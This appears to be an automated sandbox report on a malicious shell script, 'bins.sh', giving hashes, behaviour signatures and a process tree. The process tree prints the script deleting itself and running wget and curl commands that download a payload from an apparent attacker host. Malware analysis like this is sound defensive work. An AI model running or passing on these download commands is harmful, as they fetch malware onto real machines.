Analysis

  • max time kernel
    149s
  • max time network
    8s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28-10-2024 02:33

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    983c1aa3002db7f82617b43cd659c581

  • SHA1

    a4ed5b9527c45f8fd2926606512bf3fae46a8380

  • SHA256

    7ac05c613144c5e909cdf1cd4d39f6445cc999325f50bce1e855f19898bef53e

  • SHA512

    fcbd08abb414f0d1f3646716b05cbe474c72be6c996655a22929a8e1e301683dc6c77b909137408dd0daa0c9420bf9eb68102a16ec7cbbaab28f1bb9b349fbd5

  • SSDEEP

    192:0cW/YP+yrXApp3eK9Xk8RrXAppreK9Xk8oY:0cW/YmteK9Xk86eK9Xk89

Score
4/10

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:644
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:649
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/EuyepLNebPXoa5I6eLHWnxUhUkLg8RnTzR
          2⤵
          • System Network Configuration Discovery
          PID:652
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/EuyepLNebPXoa5I6eLHWnxUhUkLg8RnTzR
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:658

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads